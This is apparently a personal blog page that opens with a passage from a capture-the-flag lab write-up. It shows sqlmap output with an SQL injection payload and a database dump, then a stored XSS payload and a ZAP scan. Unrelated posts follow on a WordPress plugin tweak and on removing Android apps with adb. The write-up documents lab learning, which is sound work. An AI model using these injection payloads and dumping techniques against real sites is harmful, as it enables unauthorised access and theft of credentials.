[02:09:28] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind'
[02:09:29] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind (comment)'
[02:09:29] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind (query SLEEP)'
[02:09:29] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind (query SLEEP - comment)'
[02:09:29] [INFO] testing 'MySQL AND time-based blind (ELT)'
[02:09:29] [INFO] testing 'MySQL OR time-based blind (ELT)'
[02:09:29] [INFO] testing 'MySQL AND time-based blind (ELT - comment)'
[02:09:29] [INFO] testing 'MySQL OR time-based blind (ELT - comment)'
[02:09:29] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[02:09:29] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind (IF)'
[02:09:29] [INFO] testing 'Oracle AND time-based blind'
[02:09:29] [INFO] testing 'MySQL >= 5.1 time-based blind (heavy query) - PROCEDURE ANALYSE (EXTRACTVALUE)'
[02:09:29] [INFO] testing 'MySQL >= 5.1 time-based blind (heavy query - comment) - PROCEDURE ANALYSE (EXTRACTVALUE)'
[02:09:29] [INFO] testing 'MySQL >= 5.0.12 time-based blind - Parameter replace'
[02:09:29] [INFO] testing 'MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)'
[02:09:29] [INFO] testing 'MySQL <= 5.0.11 time-based blind - Parameter replace (heavy queries)'
[02:09:29] [INFO] testing 'MySQL time-based blind - Parameter replace (bool)'
[02:09:29] [INFO] testing 'MySQL time-based blind - Parameter replace (ELT)'
[02:09:29] [INFO] testing 'MySQL time-based blind - Parameter replace (MAKE_SET)'
[02:09:29] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[02:09:29] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[02:09:29] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[02:09:29] [INFO] target URL appears to have 2 columns in query
injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n] Y
[02:09:34] [WARNING] if UNION based SQL injection is not detected, please consider forcing the back-end DBMS (e.g. '--dbms=mysql') 
[02:09:34] [INFO] testing 'MySQL UNION query (39) - 1 to 20 columns'
[02:09:34] [INFO] testing 'MySQL UNION query (39) - 21 to 40 columns'
[02:09:35] [INFO] testing 'MySQL UNION query (39) - 41 to 60 columns'
[02:09:35] [INFO] testing 'MySQL UNION query (39) - 61 to 80 columns'
[02:09:36] [INFO] testing 'MySQL UNION query (39) - 81 to 100 columns'
[02:09:36] [INFO] checking if the injection point on GET parameter 'search' is a false positive
[02:09:36] [INFO] heuristics detected web page charset 'ascii'
[02:09:36] [WARNING] parameter length constraining mechanism detected (e.g. Suhosin patch). Potential problems in enumeration phase can be expected
GET parameter 'search' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 195 HTTP(s) requests:
Parameter: search (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: search=shoes%' AND 1839=1839 AND '%'='
[02:09:43] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
[02:09:43] [INFO] testing MySQL
[02:09:43] [WARNING] the back-end DBMS is not MySQL
[02:09:43] [INFO] testing Oracle
[02:09:43] [WARNING] the back-end DBMS is not Oracle
[02:09:43] [INFO] testing PostgreSQL
[02:09:43] [WARNING] the back-end DBMS is not PostgreSQL
[02:09:43] [INFO] testing Microsoft SQL Server
[02:09:43] [WARNING] the back-end DBMS is not Microsoft SQL Server
[02:09:43] [INFO] testing SQLite
[02:09:43] [INFO] confirming SQLite
[02:09:43] [INFO] actively fingerprinting SQLite
[02:09:43] [INFO] the back-end DBMS is SQLite
back-end DBMS: SQLite
[02:09:43] [INFO] sqlmap will dump entries of all tables from all databases now
[02:09:43] [INFO] fetching tables for database: 'SQLite_masterdb'
[02:09:43] [INFO] fetching number of tables for database 'SQLite_masterdb'
[02:09:43] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[02:09:43] [INFO] retrieved: 3
[02:09:43] [INFO] retrieved: users
[02:09:44] [INFO] retrieved: sequels
[02:09:45] [INFO] retrieved: hidden_table
[02:09:46] [INFO] retrieved: CREATE TABLE sequels (title text, kid text, age integer)
[02:09:54] [INFO] fetching entries for table 'sequels' in database 'SQLite_masterdb'
[02:09:54] [INFO] fetching number of entries for table 'sequels' in database 'SQLite_masterdb'
[02:09:54] [INFO] retrieved: 22
Database: SQLite_masterdb
Table: sequels
[22 entries]
| kid  | age  | title |

[02:09:54] [INFO] table 'SQLite_masterdb.sequels' dumped to CSV file '/root/.sqlmap/output/'
[02:09:54] [INFO] retrieved: CREATE TABLE hidden_table (flag text)
[02:10:00] [INFO] fetching entries for table 'hidden_table' in database 'SQLite_masterdb'
[02:10:00] [INFO] fetching number of entries for table 'hidden_table' in database 'SQLite_masterdb'
[02:10:00] [INFO] retrieved: 1
[02:10:00] [INFO] retrieved: thmfox{All_I_Want_for_Christmas_Is_You}
Database: SQLite_masterdb
Table: hidden_table
[1 entry]
| flag                                    |
| Here will be the flag                   |

[02:10:05] [INFO] table 'SQLite_masterdb.hidden_table' dumped to CSV file '/root/.sqlmap/output/'
[02:10:05] [INFO] retrieved: CREATE TABLE users (username text, password text)
[02:10:09] [INFO] fetching entries for table 'users' in database 'SQLite_masterdb'
[02:10:09] [INFO] fetching number of entries for table 'users' in database 'SQLite_masterdb'
[02:10:09] [INFO] retrieved: 1
[02:10:09] [INFO] retrieved: EhCNSWzzFP6sc7gB
[02:10:10] [INFO] retrieved: admin
Database: SQLite_masterdb
Table: users
[1 entry]
| username | password         |
| admin    | here password    |

[02:10:10] [INFO] table 'SQLite_masterdb.users' dumped to CSV file '/root/.sqlmap/output/'
[02:10:10] [WARNING] HTTP error codes detected during run:
400 (Bad Request) - 1 times
[02:10:10] [INFO] fetched data logged to text files under '/root/.sqlmap/output/'

[*] shutting down at 02:10:10

In the dump you find flag and password but I removed them of course.

Day 6 – Be careful what you wish on a Christmas night

Again we launch both boxes and pull the website up in the browser.

First we get a bit of a feeling for the app by adding a few items and using the search.

Then we try a basic XSS payload in the fields. <script>alert('1')</script>. In the search field, this already triggers.

In the url bar we can see the parameter.

The same payload can be used in the new book field. This results in a stored crosssite scripting. Every time you reload the site, a popup will come up.

For the next part we launch OWASP Zap and give it a moment to update after the starts. Then we start a automated scan of our target.

Basically ZAP finds the two vulnerabilities we already discussed above.

Reload the site again and have a look at what Zap added to the list. It is quite a verbose testing.

Excluding a Category from WordPress main page & RSS feed (quick & dirty)

I recently started a daily writing practice and while just using the existing blog, seemed to be the fastest way, I also did not want the posts in the main blog and RSS feed.

You can find the posts in Notebook category. By default, WordPress does not let you do that though.

Ultimate Category Excluder

The Ultimate Category Excluder (what a name) plugin lets you hide a category from the latest blog posts as well as RSS feeds. It is rather dimple to configure and does what it says it does.

It does however hide the category from all RSS feeds. I anted to have a feed for the category though, so people interested in following the notebook, could subscribe. It also allows for syndication like in Rixx notebook collection.

Quick & Dirty fix

My goal was to set this up quickly and I was already considering just running a hugo or other static generator. That would have taken quite a bit of time to properly set up as well though.

But then I found a post on the plugin’s support forums that describes a quick & dirty fix. In line 152 157 204 in /plugins/ultimate-category-excluder/ultimate-category-excluder.php change (EDIT: The line changed to 204 with the current version)

if ( $query->is_feed ) {


if ( $query->is_feed && !$query->is_archive ) {

It works and from a quick glance at the rest of the plugin’s code should not have further side effects.

That change still comes with one Drawback, I have to do it every time the plugin is updated and I can not rely on the integrity check for the plugin file since it always comes up as changed.

This can only be a short term solution and I would not recommend it for the use in customer projects. I hope excluding a category only from the main feed will be added as a feature to the plugin, but if it does not, I will eventually have to write my own solution.

Uninstalling Preinstalled Android Apps without root

On my Moto G6 every Update seems to re-enable the Outlook and linked-in in apps I disabled on purpose. You can not uninstall apps that have been installed by the manufacturer via the play store or app settings, only disable them.

So far I have been disabling them after each update but I have gotten quite annoyed by it and did a little bit of research to find out how to fully uninstall them.


What you need is the Android Developer Bridge (ADB) on your computer and you need to enable USB debugging on the phone.

I have used Windows in this guide but there is a great guide on how to set everything up in Windows, Mac & Linux over at XDA-Developers that walks you through the process.

USB Debugging on the Phone

If you haven’t enabled the Developer Mode on your phone yet, you have to navigate to Settings, then System -> About and scroll down to the buid number. Tap this 7 times to enable Developer mode.

Then You will find the Developer Settings in the Systems Settings menu. Go there and enable USB debugging.

ADB on Windows

Setting up ADB on Windows is straight forward. Download the latest ADB version, extract the files in the zip and navigate in Powershell to the extracted folder.

Tipp: You can hold down SHIFT when right-clicking in Explorer and use “Open Powershell here”

From here you can run the adb commands. Since we did not add the folder to the PATH we will have to preface the command with .\ to make it use the adb.exe in this folder.

If you follow this guide on a different OS or have ADB in your PATH you don’t have to use the .\

Connecting the Phone

Connect the phone via USB and double check that USB debugging is enabled.

Then you check for connected devices

.\adb devices                                  

This starts up the ADB service and lists connected devices

* daemon not running; starting now at tcp:5037
* daemon started successfully
List of devices attached
ZY322XXXX      unauthorized

On your phone you should get a pop-up asking you to confirm the ADB connection to the computer. After accepting it

.\adb devices                                  

Should list your device now not as unauthorized anymore.

List of devices attached
ZY322XXXX      device

Listing the Apps

.\adb shell pm list packages

Prints out a long list of all installed apps. You can use this list to find the full name of the apps you want to uninstall.


While you can uninstall most apps like linkedin and outlook you should be more careful with system apps.

Uninstalling the App

.\adb shell pm uninstall --user 0 [Package Name]

Will uninstall the app. So in my case I just had to issue

.\adb shell pm uninstall --user 0


.\adb shell pm uninstall --user 0

Once ADB returns with Success you can unplug your device and are done.

Remember to disable USB Debugging again in your Developer Settings.

Powered by WordPress & Theme by Anders Norén